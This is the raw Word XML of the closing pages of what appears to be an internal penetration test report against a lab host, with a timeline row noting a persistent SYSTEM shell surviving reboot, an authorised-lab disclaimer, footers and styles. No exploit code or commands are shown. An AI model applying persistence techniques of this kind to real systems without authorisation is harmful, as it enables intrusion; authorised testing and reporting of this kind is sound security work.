      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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2026-05-16 10:25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="330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Session 5 (persistent) verified active</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4260"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A5E" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A5E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EEF7F3" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Active SYSTEM shell confirmed post-reboot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D3B2E"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">9. Disclaimer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="1A7A5E" w:sz="4" w:space="4"/>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="4" w:space="4"/>
          <w:left w:val="single" w:color="1A7A5E" w:sz="12" w:space="6"/>
          <w:right w:val="single" w:color="1A7A5E" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:shd w:fill="E8F5F0" w:val="clear"/>
        <w:spacing w:after="120" w:before="120"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This penetration assessment was conducted exclusively within a controlled laboratory environment for educational and authorised security research purposes. All activities described herein were performed against systems owned and operated by the tester. The documented techniques are published solely to support defensive security practices and responsible vulnerability disclosure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="8B0000" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:before="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Applying any of the techniques described in this report against systems without explicit written authorisation from the system owner is unlawful and unethical.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A5E" w:sz="2" w:space="4"/>
      </w:pBdr>
      <w:spacing w:after="0" w:before="80"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="4A4A4A"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="1A7A5E"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
      <w:instrText xml:space="preserve">PAGE</w:instrText>
      <w:fldChar w:fldCharType="separate"/>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="4A4A4A"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">  |  May 16, 2026  |  Internal Network Penetration Test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5E" w:sz="4" w:space="4"/>
      </w:pBdr>
      <w:spacing w:after="100" w:before="0"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="4A4A4A"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">PENETRATION TESTING REPORT  |  CONFIDENTIAL  |  </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1A7A5E"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">192.168.40.140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0D3B2E"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="80" w:before="240"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1A7A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2026-05-19T15:41:40.295Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-19T15:41:40.295Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>